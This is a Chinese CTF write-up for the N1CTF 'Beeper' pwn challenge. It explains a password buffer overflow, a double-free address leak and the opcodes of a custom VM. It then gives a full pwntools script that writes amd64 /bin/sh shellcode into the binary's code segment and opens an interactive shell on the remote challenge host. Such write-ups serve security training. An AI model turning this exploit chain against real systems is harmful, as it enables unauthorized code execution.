[PWN]Beeper - Cpt.shao xp0int Posted on Mar 12 2018 ? Pwn ? ? Buffer-over-flow ? ? Shellcode ? 漏洞是在输入密码那里有个buffer overflow,长度够长能够一直覆盖掉下面的一些vm里面执行的代码。get_pass里头有个函数,是读取bss上的部分伪代码,根据伪代码来进行一些写入操作。我们姑且把这个函数叫做vm。 难点一在于逆向vm函数,弄懂其中的逻辑。行为表如下。 ``` heap1 = 0x57010 heap2 = 0x57030 case: '1' : --*heap2; case: 'L' : ++*heap2; case: 'N' : *heap2 = *heap1 case: 'a' : --*heap1; case: 'h' : ++input case: 'm' : ++*input case: 'o' : --input case: 'r' : ++*heap1 case: 'u' : --*input case: [] : input ? execute: skip case: {} : heap2 ? execute: skip ``` 还有一个地方卡了很久,因为开了PIE,一直找不到地址的泄露。后来发现remove那里也是有double free,heap上面有一个chunk是保存了可执行代码段的地址的。只要 `remove(0);remove(2);remove(0)` 就能够泄露出可执行段的地址,然后通过logout进入vm函数,overflow改掉vm操作的基地址,接下来就可以通过伪代码去网可执行段里面写shellcode了。 因为长度限制,这里分开了两次操作把shellcode写入段中,最后通过buy操作即可触发shellcode。 ## Run.py ```python from pwn import * LSHIFT = 'o' # --i RSHIFT = 'h' # ++i INC = 'm' # ++ (*i) DEC = 'u' # -- (*i) context.arch='amd64' password = '\x86\x13\x81\tb\xffD\xd3?\xcd\x19\xb0\xfb\x88\xfd\xae \xdf' + '\x00'*85 context.log_level = 'debug' # p = process('./beeper') p = remote('47.91.210.30', 23333) def getpass(): p.sendlineafter('password:', password) def remove(idx): p.sendlineafter('>>', '2') p.sendlineafter('?', str(idx)) def logout(py): p.sendlineafter('>>', '4') p.sendlineafter('password:', py) def show(idx): p.sendlineafter('>>', '1') p.sendlineafter(':', str(idx)) def leak(): remove(0) remove(2) remove(0) show(0) p.recvuntil('number:') addr = u64(p.recv(8)) p.info('addr: %x' % addr) return addr getpass() addr = leak() content = open('./dump.txt', 'r') # 原来Buy函数所调用到的shellcode,现在把它dump出来到txt了 origin_code = content.read()[0:0x48] # print hexdump(origin_code) # print disasm(origin_code) shellcode = asm(shellcraft.amd64.linux.sh()) # gdb.attach(p, 'b *0x555555554b7a') # print len(shellcode) # print hexdump(shellcode) # print disasm(shellcode) code = '' for i in range(24): diff = ord(shellcode[i]) - ord(origin_code[i]) if diff >= 0 : code += INC * diff else: code += DEC * (-diff) code += RSHIFT p.info('length: %d' % len(code)) # print hexdump(code) payload = '\x86\x13\x81\tb\xffD\xd3?\xcd\x19\xb0\xfb\x88\xfd\xae \xdf'.ljust(104, '\x00') + p64(addr) + code payload = payload.ljust(1999, '\x00') logout(payload) code2 = '' for i in range(24, 48): diff = ord(shellcode[i]) - ord(origin_code[i]) if diff >= 0 : code2 += INC * diff else: code2 += DEC * (-diff) code2 += RSHIFT p.info('length: %d' % len(code2)) payload2 = '\x86\x13\x81\tb\xffD\xd3?\xcd\x19\xb0\xfb\x88\xfd\xae \xdf'.ljust(104, '\x00') + p64(addr+24) + code2 payload2 = payload2.ljust(1999, '\x00') logout(payload2) p.interactive() ``` ## Flag N1CTF{5h3l1_c0d1n9_w17h_Hbf_1s_s0_e45y_233} 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [PWN]Vote - Cpt.shao
没有帐号? 立即注册